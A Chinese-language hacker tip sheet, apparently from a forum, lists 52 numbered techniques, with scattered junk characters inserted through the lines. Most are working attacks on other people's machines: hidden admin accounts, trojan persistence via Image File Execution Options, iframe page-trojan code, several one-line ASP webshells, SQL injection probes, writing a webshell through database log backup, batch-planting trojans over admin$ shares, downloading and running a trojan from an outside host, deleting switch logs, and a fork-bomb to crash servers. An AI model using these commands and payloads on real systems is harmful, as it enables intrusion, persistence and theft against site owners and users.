1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
, K6 h& n# D- |) P3 ncacls C:\windows\system32 /G hqw20:R
5 P( P' R8 d, R7 x% B思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入6 B" R- U* a y! ^( n
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
; H. X: q( x; M; e z
& V% Z% {6 }7 p1 |9 E8 M2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
1 C9 W, Z1 C0 F; ]0 D( v; r) F' x3 D9 ^8 l: Q; i4 o
3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。+ e d. u1 N I2 S/ A: j
- y- Z- N* k7 r J ?
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
9 U+ A c2 p2 k2 a* F& H7 F
8 z5 H0 M n( C9 L Y5、利用INF文件来修改注册表6 a- F* k" ]5 B: { V$ z
[Version]
+ a0 }. w8 @$ [# ~Signature="$CHICAGO$"
/ [- O1 N( Y) _' | f[Defaultinstall]
r6 J8 s0 ?& ~, a/ q g+ CaddREG=Ating- O/ Y8 X8 w( r
[Ating]/ P" C5 {% X0 _6 {* v1 ^' w
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"5 ~+ g9 E- S! r( | M6 F: r2 `- n
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:5 M9 B, j! }5 o3 X. Z! U
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径* p1 T- z O$ c; M/ `
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU9 R1 ]1 c6 }7 K# @( \( q" A
HKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
% p/ N! t! s0 OHKEY_CURRENT_CONFIG 简写为 HKCC0 M6 A5 A$ S6 v6 }8 F& K4 e$ i4 d
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
8 G" m/ r3 G7 k3 G"1"这里代表是写入或删除注册表键值中的具体数据
% c- Z3 }. [' R' V
0 D: u: C2 @1 v6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
1 X! N2 N) W: D! G- L- M多了一步就是在防火墙里添加个端口,然后导出其键值
: n9 [$ E4 j& V+ L% s+ R( M1 Z+ G[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
! w# x4 Y M& R& R1 B1 z' C3 K9 ^# L( W- V
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽
4 b- b0 _; k i) k( Y! ?3 b: V在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。( ]1 a$ W+ M* X( q: K/ [, |
( Z8 [ a# d# c( Y" A
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。
0 q' [' o1 j' m. g4 F* ~
. _3 c% k- m% B9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
+ }- I* ^& ]1 I3 D可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
: U0 W$ t0 P) o- ~
4 b3 K- s _. T: [10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
% d+ a a( ~5 B+ D. P: W B* W+ J' o" x
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
3 X: G6 t3 M9 [! f3 k. ~6 x9 A用法:xsniff –pass –hide –log pass.txt
! `* R: S* O, F. o1 o1 h. M: U1 R( o0 s' l) D
12、google搜索的艺术& v- L t, m# E
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”! W4 R: M5 Q* R2 e( i
或“字符串的语法错误”可以找到很多sql注入漏洞。3 c) O' Y( T" [; t
9 a% R E5 u9 b: e; b/ [( E13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。; B/ ` {2 ~) P, H4 _6 I
7 P' i8 x- t A4 j/ N$ a) f1 u
14、cmd中输入 nc –vv –l –p 1987: x, B" w: z9 Y5 a* q
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
. G( q4 {) m% {! t0 L7 g
) |5 V8 f9 m( S7 T15、制作T++木马,先写个ating.hta文件,内容为
+ a1 ]3 {: G. a3 e<script language="VBScript">; j( i3 y6 g# z) Z( t/ x6 [
set wshshell=createobject ("wscript.shell" )
' J- f& R' B1 f5 ?* L7 X4 ga=wshshell.run("你马的名称",1)
& c8 X9 y. l! x# J, y9 p4 F8 Zwindow.close
4 e5 s5 B! D# Q0 Q: S8 c5 n# m</script>
$ s8 T! ]8 @: f再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
- l5 t3 J4 h6 A& x3 L3 V5 h" X+ e4 T" x7 I5 X
16、搜索栏里输入0 P$ N+ p) o* D* F+ r* x# F
关键字%'and 1=1 and '%'='
6 c1 a' M9 L" a% P f! C$ N关键字%'and 1=2 and '%'='
) f2 {. W4 R L) y; Z比较不同处 可以作为注入的特征字符& ]. W2 ?) ~3 J5 W' @! v; O
+ f4 O2 s7 c; w6 H0 H s. M7 v8 {! b
17、挂马代码<html>1 k) {' r- G" J/ H0 `" t: @
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>' Z5 A4 ~' _% |. N1 S/ Q0 h
</html>
9 w1 K$ e% ], z0 `- W4 C) R$ O- t
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,0 ]8 O' k7 [- p; d! C+ g
net localgroup administrators还是可以看出Guest是管理员来。% u" f' S' ~; g
7 t8 V, }) \ r! e19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等
/ b/ C% d. b% |用法: 安装: instsrv.exe 服务名称 路径
6 X$ M5 i4 T& g5 A1 u卸载: instsrv.exe 服务名称 REMOVE$ G6 S( ^1 }+ O8 e+ _9 y: x# N
4 Z# [3 G1 o" H4 Z* G1 L
; t3 s8 V: b' A2 I7 k' E. o21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉3 H* M4 Z2 D& X3 P2 D! x
不能注入时要第一时间想到%5c暴库。* b- v, K% W! ]
) w) ~% x, r4 U; Q22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
7 Q* g2 q% r$ c% o4 q/ g N1 _4 w( T: p; s; q# B+ }1 a
23、缺少xp_cmdshell时$ h9 R' R% Y: ^7 d2 X* O
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'' B2 e( I$ s6 H; j, M
假如恢复不成功,可以尝试直接加用户(针对开3389的)
' i" D. S! u' y3 q2 gdeclare @o int; y1 F! Q: ^$ p& Y
exec sp_oacreate 'wscript.shell',@o out# M2 X a3 i9 j( [
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员" e5 P: l) E$ f: m
2 D6 L, p3 T/ h4 M6 w24.批量种植木马.bat( S; h% W4 K/ } s1 U5 \
for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中) ^2 G, l9 s3 o! W! G- Y6 d
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间' r6 ~3 {+ `3 ~7 _5 v
扫描地址.txt里每个主机名一行 用\\开头
2 e. i- R* @; w% u
* t$ j+ Z1 u( ?3 b1 c25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。- I! f1 X5 R, q( P
7 v" j0 _) G4 @! ~26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.( g8 a. \2 T7 }' ?+ J
将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下./ G- s- \7 U' U) n; x
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马
@' w& z; B2 s+ R) Q, _3 m& b* p8 p0 ]/ Z7 y
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
4 g2 G' _- |" e然后用#clear logg和#clear line vty *删除日志4 v' X4 W; n9 f- M
! @# u# J6 P& C) v$ I, u/ m
28、电脑坏了省去重新安装系统的方法( { x/ \1 d8 R& ~
纯dos下执行,, `* g$ I) G/ ?6 T5 P
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
8 h5 {" }9 t( R2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config h& |5 l8 K7 u9 k! v' L) t+ J, M
+ t% ~. W! z4 ^3 _29、解决TCP/IP筛选 在注册表里有三处,分别是:8 @* D: t4 f# y5 W/ N6 @
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
2 m6 {$ W0 ]; M5 }HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! B; H* ~. {* I+ M) ZHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
$ G7 K: }2 H& q6 o分别用
# b* @! ^* ^+ G2 wregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
- M3 V2 C5 Y g4 aregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip) e& {/ v' x B/ f
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip1 m5 z3 s2 O7 s4 J! W- A6 h, E/ c
命令来导出注册表项; y6 H/ d m( l8 c: S
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
9 I# W, N x! X/ S) B+ O E5 ]改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用
/ A6 z/ R' b# ]: S f' jregedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
+ w$ r9 i! m5 _
* T F2 b2 M1 h0 t1 A" l* s m30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
( F% {8 Q6 f1 m* ~* X6 b! FSER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的38 Z$ V$ o5 P- q1 [9 ~
3 l0 a$ a5 p* t! {! V, V2 i9 a! g/ O
31、全手工打造开3389工具5 V: z6 x# H6 M" ~8 c
打开记事本,编辑内容如下:- y( l+ V3 p* K- [
echo [Components] > c:\sql- ~/ c/ y7 B4 y& R2 X- I) r3 L5 O8 h
echo TSEnable = on >> c:\sql" V2 f* W# a3 ^' M5 q* e7 c2 x
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
! Q* j3 U, x3 V; ?. t( H编辑好后存为BAT文件,上传至肉鸡,执行3 f! ~5 ?7 {6 _! `
- y- |6 H9 o9 p. g+ U
32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马& B0 U% C7 N' Z
: d4 V2 P+ H$ n/ E9 y" ~33、让服务器重启
+ N. I3 i, h0 I# V写个bat死循环:. x, ?2 p B7 m, d( v7 v( q C" n
@echo off+ l' r+ q) Y, n1 w' o" l4 @ L. {
:loop1
/ B! B8 s, m. c( a& \# z/ M8 U4 Scls, R; T7 J$ n1 `4 a& B3 z' w0 D' ]
start cmd.exe
+ c' n6 c- ^" Q# x" M( ngoto loop1
7 J$ `+ a* u; i保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启! x* C. K" B, S B9 h
) w9 l: o0 ?0 f! Q2 Z) T
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,: M8 u. P8 t3 M. i2 s$ R
@echo off- s8 w' Z E, o; S' ?( C1 j
date /t >c:/3389.txt5 _8 U9 k3 D; v% i. Q& s' t( {
time /t >>c:/3389.txt
* v. d# x6 E& A0 ?2 vattrib +s +h c:/3389.bat( ~' R* f, U) T3 K
attrib +s +h c:/3389.txt7 U+ F* D: H" F# k, R
netstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
; x0 \2 @ p7 Y4 U" l并保存为3389.bat
( _4 g( _+ `5 e打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号% _+ v: D3 Q2 U; g5 M1 c4 u
. H+ j P1 x/ ?2 p$ E6 G& _7 f35、有时候提不了权限的话,试试这个命令,在命令行里输入:
! w- j: S* l% x1 [start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)
! K: f: t; M- Y/ d) b4 s" Z; K输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
5 K4 y7 Y) V* W0 W t. ?( k% L6 A) v0 ?7 r5 x
36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
4 T9 @. X$ ]6 I2 [' v, S: |9 }, i, t6 Xecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
) i, q9 Z- M5 @( zecho 你的FTP账号 >>c:\1.bat //输入账号
2 O# ~- z, p, q3 F$ v4 gecho 你的FTP密码 >>c:\1.bat //输入密码* B: a, ^& _: Q' {
echo bin >>c:\1.bat //登入8 H4 E+ g6 m7 {8 @
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
% T9 t, l# t) Z1 B" j/ Secho bye >>c:\1.bat //退出
& ]0 L" B8 w p9 g3 v然后执行ftp -s:c:\1.bat即可$ `% L- H4 g) \5 P
. `" Y2 i1 ]6 D! F" Q8 U
37、修改注册表开3389两法
: C5 n: t$ l9 q- b(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
9 |+ B+ N- Q$ L2 V" N) y& Decho Windows Registry Editor Version 5.00 >>3389.reg
: m) o- M' X: h2 b W( yecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
: K3 p/ g! z5 o1 aecho "Enabled"="0" >>3389.reg" b2 j0 T+ Z& N1 d- Q
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows, `; J( C8 R5 o) ^0 o: u: g
NT\CurrentVersion\Winlogon] >>3389.reg
( {- _! F1 G, h, {% ]+ a. c! @! Zecho "ShutdownWithoutLogon"="0" >>3389.reg
% j V# ]1 l3 X G9 becho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
" N M7 ~9 r1 j>>3389.reg
4 j7 ?% A8 A3 `! k: n; B/ v, zecho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
3 u! |1 y W% t, w7 P- M) decho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]; Y+ c5 o" g# B! ]0 f3 Y, j$ |
>>3389.reg
/ B: Z4 x$ B( gecho "TSEnabled"=dword:00000001 >>3389.reg. l/ o d" N, y
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg) Q5 `) ]9 z6 B
echo "Start"=dword:00000002 >>3389.reg
3 p; x* l/ g- ^9 x& W# W% @6 \echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
& y) _' \7 Q' p$ V4 C: K3 X9 k>>3389.reg) O; k- K, {2 N1 @: A
echo "Start"=dword:00000002 >>3389.reg% ^3 E6 k7 L( `: c9 X
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg: o% R. d$ `2 B% t! S# o
echo "Hotkey"="1" >>3389.reg
9 Y( N6 U# T1 X% E8 C( p! pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal% W, P% r3 R X6 Y: e) R1 ?; C* a
Server\Wds\rdpwd\Tds\tcp] >>3389.reg' P2 O! h# w7 b9 P1 c9 Z: W5 W7 F% N
echo "PortNumber"=dword:00000D3D >>3389.reg5 J+ a ^; g T- O& K2 \
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
5 t. P' a% f8 o; z6 G0 YServer\WinStations\RDP-Tcp] >>3389.reg3 [$ S! p/ A5 b- H. ]
echo "PortNumber"=dword:00000D3D >>3389.reg& j$ b5 R5 D- ^. N4 E1 g/ e
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
7 t6 G8 {! X! H+ Q6 I0 e8 Y# T(如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
& j$ G! F( D6 m因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效. a0 n1 U) E. U+ Z3 v, G
(2)winxp和win2003终端开启, ~/ a1 K6 Q$ i/ o0 ?8 S: W% ]" m
用以下ECHO代码写一个REG文件:0 p# K$ b5 L* H4 X5 S/ [
echo Windows Registry Editor Version 5.00>>3389.reg) Y, P! I' I" w3 S
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 P, e( V3 W, E, q6 KServer]>>3389.reg. Q) v+ @$ {0 g% Q& T3 {
echo "fDenyTSConnections"=dword:00000000>>3389.reg
! g! @; u% C: _% Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
, ^1 p+ p8 O1 b7 ?3 {Server\Wds\rdpwd\Tds\tcp]>>3389.reg
+ P$ u$ v9 W; B0 T5 k$ h1 Eecho "PortNumber"=dword:00000d3d>>3389.reg
9 A& l- g$ T9 w4 l. vecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal2 j& @6 s8 h8 `9 E: Z
Server\WinStations\RDP-Tcp]>>3389.reg+ i" |% E4 |* Y5 ^0 w; a8 K
echo "PortNumber"=dword:00000d3d>>3389.reg
: R, x3 \' H% p9 L) S然后regedit /s 3389.reg del 3389.reg
0 _* {8 V5 A0 D' ^* Z9 |/ a: jXP下不论开终端还是改终端端口都不需重启
o3 N4 u& [1 p" H2 `) |2 U1 w: n
! y: h" w/ x! r: D% y. \38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃7 C' }/ O! B' E' Y4 @: G' q1 a
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
* y$ X" W2 [! i9 v0 ~0 j4 b/ H( p
# Y0 h. Z) J& {% `) q) Y1 k39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!7 e8 X* P" ]! b$ }, n% L
(1)数据库文件名应复杂并要有特殊字符% [" d" S0 q* U3 F
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
4 s9 a+ }5 x, O+ c. R( x5 P0 k将conn.asp文档中的
. ]6 T7 I( |5 z0 b( y' R/ {* bDBPath = Server.MapPath("数据库.mdb")
M+ ~ s# ]' Z6 _7 Econn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
+ K/ `! I6 Q: Z
( E, b8 C& J9 t5 T) ]& C修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
' A+ `( T1 G: J- C$ x4 Y9 U5 n+ Y(3)不放在WEB目录里( _9 ~4 M' s* r: |+ k5 u2 _
. f# s% H5 P: S- ?6 Y4 ~3 r6 I( d40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
1 f1 z3 ?# o. M: o- u可以写两个bat文件
) a9 R" [" g/ n" U4 N+ N@echo off
% _) D8 M+ {9 ^) \@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
8 k. H' v7 Y% ]. V* K; X9 ~@del c:\winnt\system32\query.exe; b% Y# y3 [" G: k k0 B$ t
@del %SYSTEMROOT%\system32\dllcache\query.exe
4 z2 g; _3 u: h5 W2 |@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
5 {; _* ~# F, \- R: t& _ @) r
6 Q5 t9 g' r* C; r1 r1 _@echo off
+ P4 |% t5 \5 I* E; m@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe
& R" ~. `# y3 m' t0 U3 B) v@del c:\winnt\system32\tsadmin.exe/ U) E% u _6 K& [4 t' M' e% k ?
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex7 M' l8 h- ]6 E1 X5 L
) t. M8 X# Z! c3 I: V41、映射对方盘符0 t. ^2 ~7 x0 p
telnet到他的机器上,, }4 p3 Y ^4 [" Z1 @
net share 查看有没有默认共享 如果没有,那么就接着运行
& k3 ~+ f5 b3 ^net share c$=c:8 F* R: {5 V3 ]9 J5 g, b
net share现在有c$. I& `7 d2 Q0 @4 o- B
在自己的机器上运行
+ ], }4 }0 U) q' i/ J mnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
( ]0 F' l1 q1 G
+ J1 I4 W( E# j3 F5 |" y42、一些很有用的老知识, ~, t( s `3 M0 D/ H7 {3 o
type c:\boot.ini ( 查看系统版本 )
0 v0 H V2 J0 F* Nnet start (查看已经启动的服务) Y, C4 V; L, G( k
query user ( 查看当前终端连接 )
1 L4 q0 W' }' @: tnet user ( 查看当前用户 )
, {# u9 _, Q! ^( [net user 用户 密码/add ( 建立账号 )! Y) Z2 |6 `8 Y$ ]
net localgroup administrators 用户 /add (提升某用户为管理员)0 L4 k+ L# E% m, S
ipconfig -all ( 查看IP什么的 )
1 o6 ~! L: n+ mnetstat -an ( 查看当前网络状态 )+ }5 `. y- W8 Y; b) B. n3 T+ I
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)4 p8 n, X- ~3 n6 A) w& j
克隆时Administrator对应1F4
1 e$ X. _- i; b* pguest对应1F5
. c; t$ m! _* X; Htsinternetuser对应3E86 Z& ~' o4 x& n5 X% Q, a; F
4 T' E4 H' q8 p" X c3 Z; s$ `7 I43、如果对方没开3389,但是装了Remote Administrator Service) N+ N E& X/ P/ X! [$ J
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接( M) ^7 `& `: d" ]3 M8 P! R
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息/ K5 q# |1 M) @1 ~' G& d
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"1 b! d5 H! W1 l% B
# u( @$ k5 K6 l) V* }44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)- u8 I% _# a0 L1 i' g/ u
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
5 A y: g* H' v, v7 z, t
% {* t3 O1 j' a' {45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
6 l* n$ Z$ C- v( n1 {0 h. Mecho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open( o' [( a8 G/ V' t9 d1 i
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
- `2 s5 B7 p2 O4 V* mCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =9 [; p+ B/ V D6 t" i
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs6 p, x- f9 u& a" }$ ?6 C) ?
(这是完整的一句话,其中没有换行符)
0 l0 ], m% h) `% ^9 k然后下载:
! X+ f8 _' N2 j& N1 Ocscript down.vbs http://www.hack520.org/hack.exe hack.exe
. Z3 I; T, M0 C: V5 `4 q. ?2 `& A# X* D6 n: Y1 A3 X
46、一句话木马成功依赖于两个条件:% C0 a9 r$ z0 {. F
1、服务端没有禁止adodb.Stream或FSO组件
R$ \8 l: V3 F# p* U1 Y2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。2 F- h6 ~( t+ z* ]+ S9 Z
: y) e9 a5 {0 Y8 c
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
. n6 {* ~& k, s9 w6 y;alter database utsz set RECOVERY FULL--8 G+ y+ E) f6 o7 E* }7 {
;create table cmd (a image)--
) B2 K2 y/ q7 t$ c$ N& r;backup log utsz to disk = 'D:\cmd' with init--1 u0 e& a6 s( ~4 i7 C6 w
;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--" F6 P% I0 Z$ h4 f
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--5 @; g& P4 A% y! x
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。) u" q" M* L9 H! W3 O* V; D
" l, O7 l- {4 q% t
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
" l a% K! M, x; ~' E, D; k, @
- T0 H0 G- V& t) N用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options
) F( t& p: d+ J! _所有会话用 'all'。
7 ?7 ?5 W( T$ c: q# u/ G- Z' A5 N-s sessionid 列出会话的信息。( b! a5 ^' a6 }! Z* n( x) ~
-k sessionid 终止会话。
2 d) l& N1 Y( ]' A-m sessionid 发送消息到会话。6 u2 F7 ~; p- R
0 E3 W/ \9 ?7 M2 K6 x( M* B0 d) A
config 配置 telnet 服务器参数。
( q) _/ |- J: U0 c2 ~4 m! F$ E% _1 L! C$ {! S e# [
common_options 为:& [; [$ _0 f" I: l& [0 g% q
-u user 指定要使用其凭据的用户
* [- o+ _% f: S" q, v4 a-p password 用户密码2 h: M) _* n, _3 @1 [& }
" X& w* `6 d. S) z5 j+ U' Z
config_options 为:
( `, G2 |, u9 X4 d& W3 ~1 M9 ydom = domain 设定用户的默认域8 j. P9 \6 {9 k& u3 u9 E7 M
ctrlakeymap = yes|no 设定 ALT 键的映射' V3 R4 k. B6 ~0 b# b7 i
timeout = hh:mm:ss 设定空闲会话超时值
2 k+ d) P5 j& j0 B( \timeoutactive = yes|no 启用空闲会话。
9 P) G7 F2 c2 f5 |. I' _! lmaxfail = attempts 设定断开前失败的登录企图数。
2 Y% Q8 a8 \8 w, K9 j6 h [1 q0 M- V1 amaxconn = connections 设定最大连接数。- d5 Y8 c3 \8 P _! P. p
port = number 设定 telnet 端口。" h2 Z2 \: u5 R$ e8 Y, l! O# a
sec = [+/-]NTLM [+/-]passwd
' k$ C5 D5 u6 K% Z6 p设定身份验证机构
5 e. H! V( ~' f( u% Hfname = file 指定审计文件名。# u+ ^; n6 W& \& Z7 J4 J6 N% B
fsize = size 指定审计文件的最大尺寸(MB)。6 {& T; N( g. {, S. t3 h0 Z6 ]+ J. l
mode = console|stream 指定操作模式。
: z% P- {6 Q7 Y0 l* J8 Pauditlocation = eventlog|file|both
5 @; B# H+ {- M指定记录地点
) A" _* l) N# ]audit = [+/-]user [+/-]fail [+/-]admin( c# z3 ~3 L4 e) \# B8 x9 K2 n
1 C# i7 _3 E8 K49、例如:在IE上访问:( A; h$ p( S9 L
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
' y5 P8 G$ L( K! ^& S: s- w1 E6 Yhack.txt里面的代码是:
E4 O( {# _- P+ l$ A5 a9 h<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
: a: O K1 v3 k把这个hack.txt发到你空间就可以了! q+ @* D8 m& P0 l; Z1 D
这个可以利用来做网马哦!
: K; P) _4 N, p/ G3 h0 G9 Q/ X4 U$ _- K6 v( }! Y
50、autorun的病毒可以通过手动限制!* f h! d9 P1 |8 C. L* ^: j+ G# R1 ~
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!+ C( o# f3 r( x& _
2,打开盘符用右键打开!切忌双击盘符~
' o$ Y& F- e% O7 |8 u; {3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!
# B' ^' W; c2 B& J. W; i6 l2 S" X! d+ E, D9 z8 o
51、log备份时的一句话木马:
2 |; V% c+ r# w; \; y4 da).<%%25Execute(request("go"))%%25>
' U' Z; u& N. r' f; `b).<%Execute(request("go"))%>
9 d9 M9 C% z, n0 uc).%><%execute request("go")%><%( A/ g, b4 w( D: _
d).<script language=VBScript runat=server>execute request("sb")</Script># E$ O& _2 F- r# r z( S/ s
e).<%25Execute(request("l"))%25># g5 t. p, }+ D E- ]( U/ w
f).<%if request("cmd")<>"" then execute request("pass")%>" }0 n! _1 E. r3 s+ z* S( \
0 y3 t) F# Z4 u, k: u, {- s52、at "12:17" /interactive cmd
" J8 Z% L9 \5 @执行后可以用AT命令查看新加的任务
4 w4 B! ]: \( Q& A6 f3 `9 G用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
( q* I0 K3 y# s2 r" x
